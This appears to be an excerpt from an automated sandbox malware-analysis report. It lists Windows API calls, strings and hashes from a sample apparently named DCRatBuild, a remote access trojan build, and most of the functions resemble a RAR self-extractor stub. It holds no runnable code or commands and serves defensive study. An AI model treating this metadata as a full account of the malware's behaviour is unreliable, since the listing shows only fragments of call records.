                                        • Part of subcall function 00F07BF5: CloseHandle.KERNEL32(?), ref: 00F07C59
                                      • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 00F0730C
                                      • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00F0741A
                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00F07446
                                      • CloseHandle.KERNEL32(?), ref: 00F07457
                                      • GetLastError.KERNEL32 ref: 00F07467
                                      • RemoveDirectoryW.KERNEL32(?), ref: 00F074B3
                                      • DeleteFileW.KERNEL32(?), ref: 00F074DB
                                      Strings
                                      • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                      APIs
                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00F28767
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00F28771
                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00F2877E
                                      Strings
                                      • String ID: .
                                      APIs
                                      • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00F1A662
                                      • GetNumberFormatW.KERNEL32(00000400,00000000,?,00F3E600,?,?), ref: 00F1A6B1
                                      APIs
                                      • GetLastError.KERNEL32(00F1117C,?,00000200), ref: 00F06EC9
                                      • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00F06EEA
                                      APIs
                                      • GetVersionExW.KERNEL32(?), ref: 00F0AD1A
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0001F070,00F1EAC5), ref: 00F1F068
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: HeapProcess
                                      • String ID:
                                      • API String ID: 54951025-0
                                      • Opcode ID: b68c98a75ae2e888b917dedad50cd0dbd56f9d259182bb188b1eba87fdf3395a
                                      • Instruction ID: 36f764dcfebaf537aa6d58b0f47236ca0238f660e0c23505999444d690591e99
                                      • Opcode Fuzzy Hash: b68c98a75ae2e888b917dedad50cd0dbd56f9d259182bb188b1eba87fdf3395a
                                      • Instruction Fuzzy Hash: 53A011B8A00208CB8300CF32AA0820A3AAABA002A03088228A00AC2020EA288020AF00
                                      APIs
                                      • _swprintf.LIBCMT ref: 00F0DABE
                                        • Part of subcall function 00F0400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F0401D
                                        • Part of subcall function 00F11596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00F40EE8,00000200,00F0D202,00000000,?,00000050,00F40EE8), ref: 00F115B3
                                      • _strlen.LIBCMT ref: 00F0DADF
                                      • SetDlgItemTextW.USER32(?,00F3E154,?), ref: 00F0DB3F
                                      • GetWindowRect.USER32(?,?), ref: 00F0DB79
                                      • GetClientRect.USER32(?,?), ref: 00F0DB85
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00F0DC25
                                      • GetWindowRect.USER32(?,?), ref: 00F0DC52
                                      • SetWindowTextW.USER32(?,?), ref: 00F0DC95
                                      • GetSystemMetrics.USER32(00000008), ref: 00F0DC9D
                                      • GetWindow.USER32(?,00000005), ref: 00F0DCA8
                                      • GetWindowRect.USER32(00000000,?), ref: 00F0DCD5
                                      • GetWindow.USER32(00000000,00000002), ref: 00F0DD47
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                      • String ID: I=u$$%s:$CAPTION$d
                                      • API String ID: 2407758923-1991495195
                                      • Opcode ID: 85ba0a06ccbad13adb42b650ff8d1ce592794ee69df7ad8e541e95af23f33838
                                      • Instruction ID: f01dc9d287e4cd3b74ae05a8a50e277a0da6ebf6c831d6a91969071f3dea16a1
                                      • Opcode Fuzzy Hash: 85ba0a06ccbad13adb42b650ff8d1ce592794ee69df7ad8e541e95af23f33838
                                      • Instruction Fuzzy Hash: E281D171508305AFD710DFA8CC88E6BBBE9EBC9714F04491DFA94E3290D674E905EB52
                                      APIs
                                      • ___free_lconv_mon.LIBCMT ref: 00F2C277
                                        • Part of subcall function 00F2BE12: _free.LIBCMT ref: 00F2BE2F
                                        • Part of subcall function 00F2BE12: _free.LIBCMT ref: 00F2BE41
                                        • Part of subcall function 00F2BE12: _free.LIBCMT ref: 00F2BE53
                                        • Part of subcall function 00F2BE12: _free.LIBCMT ref: 00F2BE65
                                        • Part of subcall function 00F2BE12: _free.LIBCMT ref: 00F2BE77
                                        • Part of subcall function 00F2BE12: _free.LIBCMT ref: 00F2BE89
                                        • Part of subcall function 00F2BE12: _free.LIBCMT ref: 00F2BE9B
                                        • Part of subcall function 00F2BE12: _free.LIBCMT ref: 00F2BEAD
                                        • Part of subcall function 00F2BE12: _free.LIBCMT ref: 00F2BEBF
                                        • Part of subcall function 00F2BE12: _free.LIBCMT ref: 00F2BED1
                                        • Part of subcall function 00F2BE12: _free.LIBCMT ref: 00F2BEE3
                                        • Part of subcall function 00F2BE12: _free.LIBCMT ref: 00F2BEF5
                                        • Part of subcall function 00F2BE12: _free.LIBCMT ref: 00F2BF07
                                      • _free.LIBCMT ref: 00F2C26C
                                        • Part of subcall function 00F284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00F2BFA7,00F33958,00000000,00F33958,00000000,?,00F2BFCE,00F33958,00000007,00F33958,?,00F2C3CB,00F33958), ref: 00F284F4
                                        • Part of subcall function 00F284DE: GetLastError.KERNEL32(00F33958,?,00F2BFA7,00F33958,00000000,00F33958,00000000,?,00F2BFCE,00F33958,00000007,00F33958,?,00F2C3CB,00F33958,00F33958), ref: 00F28506
                                      • _free.LIBCMT ref: 00F2C28E
                                      • _free.LIBCMT ref: 00F2C2A3
                                      • _free.LIBCMT ref: 00F2C2AE
                                      • _free.LIBCMT ref: 00F2C2D0
                                      • _free.LIBCMT ref: 00F2C2E3
                                      • _free.LIBCMT ref: 00F2C2F1
                                      • _free.LIBCMT ref: 00F2C2FC
                                      • _free.LIBCMT ref: 00F2C334
                                      • _free.LIBCMT ref: 00F2C33B
                                      • _free.LIBCMT ref: 00F2C358
                                      • _free.LIBCMT ref: 00F2C370
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                      • String ID:
                                      • API String ID: 161543041-0
                                      • Opcode ID: e7b2c2661b80c4f21447f1b3ee7c377b0720c6c7a79b5a1b9cd952728cf5309b
                                      • Instruction ID: e1f5739cf4704c1345ee8701fbc8b3bfd478f59cc04a1fa93c75162b847601b7
                                      • Opcode Fuzzy Hash: e7b2c2661b80c4f21447f1b3ee7c377b0720c6c7a79b5a1b9cd952728cf5309b
                                      • Instruction Fuzzy Hash: 24317031900625DFEB20EAB9FD45B5A73E9FF00360F148869E449DB591DF35AC41EB90
                                      APIs
                                      • GetWindow.USER32(?,00000005), ref: 00F1CD51
                                      • GetClassNameW.USER32(00000000,?,00000800), ref: 00F1CD7D
                                        • Part of subcall function 00F117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00F0BB05,00000000,.exe,?,?,00000800,?,?,00F185DF,?), ref: 00F117C2
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00F1CD99
                                      • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00F1CDB0
                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 00F1CDC4
                                      • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00F1CDED
                                      • DeleteObject.GDI32(00000000), ref: 00F1CDF4
                                      • GetWindow.USER32(00000000,00000002), ref: 00F1CDFD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                      • String ID: STATIC
                                      • API String ID: 3820355801-1882779555
                                      • Opcode ID: 23b16df96186c2d68b74d1c8043ea5ab0b304332482398a76c146bc463f78002
                                      • Instruction ID: 14e97b89e18370a565fa668cfa746095186337a23c40547c242bedd142833e4a
                                      • Opcode Fuzzy Hash: 23b16df96186c2d68b74d1c8043ea5ab0b304332482398a76c146bc463f78002
                                      • Instruction Fuzzy Hash: 29110A729887147BE2216B70AC4AFDF765CFF55B51F004420FA62A10D2CAA48986B6E5
                                      APIs
                                      • _free.LIBCMT ref: 00F28EC5
                                        • Part of subcall function 00F284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00F2BFA7,00F33958,00000000,00F33958,00000000,?,00F2BFCE,00F33958,00000007,00F33958,?,00F2C3CB,00F33958), ref: 00F284F4
                                        • Part of subcall function 00F284DE: GetLastError.KERNEL32(00F33958,?,00F2BFA7,00F33958,00000000,00F33958,00000000,?,00F2BFCE,00F33958,00000007,00F33958,?,00F2C3CB,00F33958,00F33958), ref: 00F28506
                                      • _free.LIBCMT ref: 00F28ED1
                                      • _free.LIBCMT ref: 00F28EDC
                                      • _free.LIBCMT ref: 00F28EE7
                                      • _free.LIBCMT ref: 00F28EF2
                                      • _free.LIBCMT ref: 00F28EFD
                                      • _free.LIBCMT ref: 00F28F08
                                      • _free.LIBCMT ref: 00F28F13
                                      • _free.LIBCMT ref: 00F28F1E
                                      • _free.LIBCMT ref: 00F28F2C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: b110bb066a500bf50f7c96467a99f5865f43c0200f1342ed1949e502a8c902a3
                                      • Instruction ID: b102406c1fda998e493011aab8d86ee31296d64f4ddce7ac907c6f0578213ae8
                                      • Opcode Fuzzy Hash: b110bb066a500bf50f7c96467a99f5865f43c0200f1342ed1949e502a8c902a3
                                      • Instruction Fuzzy Hash: F511A47650211DAFCB11FF94EC42CDA3BA5FF04390B5140E5BA098B626DA35DA52AB80
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ;%u$x%u$xc%u
                                      • API String ID: 0-2277559157
                                      • Opcode ID: 6e042d4506dfd7da4d69a6ca186d5b3e3ad81ca48cbb4aaed09e29b77da11155
                                      • Instruction ID: b80ed04839493091023ff5435603987359662c92c6fea493d8811f5d1d781f10
                                      • Opcode Fuzzy Hash: 6e042d4506dfd7da4d69a6ca186d5b3e3ad81ca48cbb4aaed09e29b77da11155
                                      • Instruction Fuzzy Hash: 33F11871A042405BDB65DF388C99BFE779A6F90310F08056DF9858B2C3DA699848F7B2
                                      APIs
                                        • Part of subcall function 00F0130B: GetDlgItem.USER32(00000000,00003021), ref: 00F0134F
                                        • Part of subcall function 00F0130B: SetWindowTextW.USER32(00000000,00F335B4), ref: 00F01365
                                      • EndDialog.USER32(?,00000001), ref: 00F1AD20
                                      • SendMessageW.USER32(?,00000080,00000001,?), ref: 00F1AD47
                                      • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00F1AD60
                                      • SetWindowTextW.USER32(?,?), ref: 00F1AD71
                                      • GetDlgItem.USER32(?,00000065), ref: 00F1AD7A
                                      • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00F1AD8E
                                      • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00F1ADA4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: MessageSend$Item$TextWindow$Dialog
                                      • String ID: LICENSEDLG
                                      • API String ID: 3214253823-2177901306
                                      • Opcode ID: c3d599f76dc2f3b5bef70076d202698e2355833b87b520e35cdcfe4d34374dc1
                                      • Instruction ID: 4e78fad12ffda96bb5d07d20406f761b834306a2ae74bdeebae77b5aa9b7ae1d
                                      • Opcode Fuzzy Hash: c3d599f76dc2f3b5bef70076d202698e2355833b87b520e35cdcfe4d34374dc1
                                      • Instruction Fuzzy Hash: 7B21D332645609BBD2255F21FC49EBB3B6CFB47B56F010008F604E24A0CBA6AA41F632
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00F09448
                                      • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00F0946B
                                      • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00F0948A
                                        • Part of subcall function 00F117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00F0BB05,00000000,.exe,?,?,00000800,?,?,00F185DF,?), ref: 00F117C2
                                      • _swprintf.LIBCMT ref: 00F09526
                                        • Part of subcall function 00F0400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F0401D
                                      • MoveFileW.KERNEL32(?,?), ref: 00F09595
                                      • MoveFileW.KERNEL32(?,?), ref: 00F095D5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                                      • String ID: rtmp%d
                                      • API String ID: 2111052971-3303766350
                                      • Opcode ID: d31b0e2a4e8d5f99e34e52e6f8658889ba8b4fd5fb7b09f743dd8d12e7198133
                                      • Instruction ID: 6262a8c839e514a9a7c917d796c8a3f72371981ee8d7d66cfb1ebe22d1cb21fa
                                      • Opcode Fuzzy Hash: d31b0e2a4e8d5f99e34e52e6f8658889ba8b4fd5fb7b09f743dd8d12e7198133
                                      • Instruction Fuzzy Hash: 83414F7190425866DF20EB60CC85AEF737CAF55390F0444E5B649E3092FBB89B89FB64
                                      APIs
                                      • __aulldiv.LIBCMT ref: 00F10A9D
                                        • Part of subcall function 00F0ACF5: GetVersionExW.KERNEL32(?), ref: 00F0AD1A
                                      • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00F10AC0
                                      • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00F10AD2
                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00F10AE3
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F10AF3
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F10B03
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F10B3D
                                      • __aullrem.LIBCMT ref: 00F10BCB
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                      • String ID:
                                      • API String ID: 1247370737-0
                                      • Opcode ID: 1e9f93d9157e70ba080a78504f6ed306ba87fc29bced6c748364fb05367d2515
                                      • Instruction ID: 899ec51248b2e1041f625aabb74a9e7a33a49d1a6e9d88b0c7d794c4cd1c40e4
                                      • Opcode Fuzzy Hash: 1e9f93d9157e70ba080a78504f6ed306ba87fc29bced6c748364fb05367d2515
                                      • Instruction Fuzzy Hash: 404128B1408306AFC314DF64C8809ABFBF9FF88715F004A2EF59692650E779E588DB52
                                      APIs
                                      • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00F2F5A2,?,00000000,?,00000000,00000000), ref: 00F2EE6F
                                      • __fassign.LIBCMT ref: 00F2EEEA
                                      • __fassign.LIBCMT ref: 00F2EF05
                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00F2EF2B
                                      • WriteFile.KERNEL32(?,?,00000000,00F2F5A2,00000000,?,?,?,?,?,?,?,?,?,00F2F5A2,?), ref: 00F2EF4A
                                      • WriteFile.KERNEL32(?,?,00000001,00F2F5A2,00000000,?,?,?,?,?,?,?,?,?,00F2F5A2,?), ref: 00F2EF83
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                      • String ID:
                                      • API String ID: 1324828854-0
                                      • Opcode ID: efe301dd28101e44ab8f59508b1ad779a596a2861ccfaf0a427786ed6a16a67c
                                      • Instruction ID: 042478aff01861d13b7c0cf91c748ec6e1c289eeea7870670f89b9f579ad6c1d
                                      • Opcode Fuzzy Hash: efe301dd28101e44ab8f59508b1ad779a596a2861ccfaf0a427786ed6a16a67c
                                      • Instruction Fuzzy Hash: 0751E5B1E002199FCB10CFA8ED85AEEBBF9FF09310F24451AE955E7291D770A941DB60
                                      APIs
                                      • GetTempPathW.KERNEL32(00000800,?), ref: 00F1C54A
                                      • _swprintf.LIBCMT ref: 00F1C57E
                                        • Part of subcall function 00F0400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F0401D
                                      • SetDlgItemTextW.USER32(?,00000066,00F4946A), ref: 00F1C59E
                                      • _wcschr.LIBVCRUNTIME ref: 00F1C5D1
                                      • EndDialog.USER32(?,00000001), ref: 00F1C6B2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                                      • String ID: %s%s%u
                                      • API String ID: 2892007947-1360425832
                                      • Opcode ID: d15e9c01b995f5913de87782768d2fc4e5ad5b3a6a209a3f56c77aebc498d483
                                      • Instruction ID: caa766fdf6d0e7742c792d78019b90700f9ff9751520c8f291a285dc2396644d
                                      • Opcode Fuzzy Hash: d15e9c01b995f5913de87782768d2fc4e5ad5b3a6a209a3f56c77aebc498d483
                                      • Instruction Fuzzy Hash: 0B41C371D4061CAADB26DBA0CC45EDA77BDEF09711F0040A6E909E60A0E7799BC4EF90
                                      APIs
                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00F18F38
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00F18F59
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AllocByteCharGlobalMultiWide
                                      • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                      • API String ID: 3286310052-4209811716
                                      • Opcode ID: 378c46b4f71d7b5fb2ac69c7516b6c6157a5a960b8bf2a750bd167e07969255e
                                      • Instruction ID: f8466fcbb1309224b818f95516072b2c1406b2c87e525bf1af3122607ca09ef5
                                      • Opcode Fuzzy Hash: 378c46b4f71d7b5fb2ac69c7516b6c6157a5a960b8bf2a750bd167e07969255e
                                      • Instruction Fuzzy Hash: 49311C319083156BD714BB70AC03FEF7759DF51770F140519F801961C1DF68E94AA3A6
                                      APIs
                                      • ShowWindow.USER32(?,00000000), ref: 00F1964E
                                      • GetWindowRect.USER32(?,00000000), ref: 00F19693
                                      • ShowWindow.USER32(?,00000005,00000000), ref: 00F1972A
                                      • SetWindowTextW.USER32(?,00000000), ref: 00F19732
                                      • ShowWindow.USER32(00000000,00000005), ref: 00F19748
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                       • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmp
                                       • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: Window$Show$RectText
                                      • String ID: RarHtmlClassName
